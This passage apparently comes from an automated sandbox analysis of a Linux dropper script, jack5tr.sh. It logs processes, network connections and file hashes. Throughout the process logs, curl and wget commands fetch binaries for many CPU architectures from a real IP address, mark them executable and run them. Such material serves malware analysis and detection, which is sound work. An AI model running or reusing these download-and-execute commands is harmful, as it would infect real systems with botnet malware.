[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:37
Platform
debian12-armhf-20240221-en
Max time kernel
8s
Max time network
310s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-95ee504168b8491395abd7d23b35057c-logrotate.service-4xrxzy systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
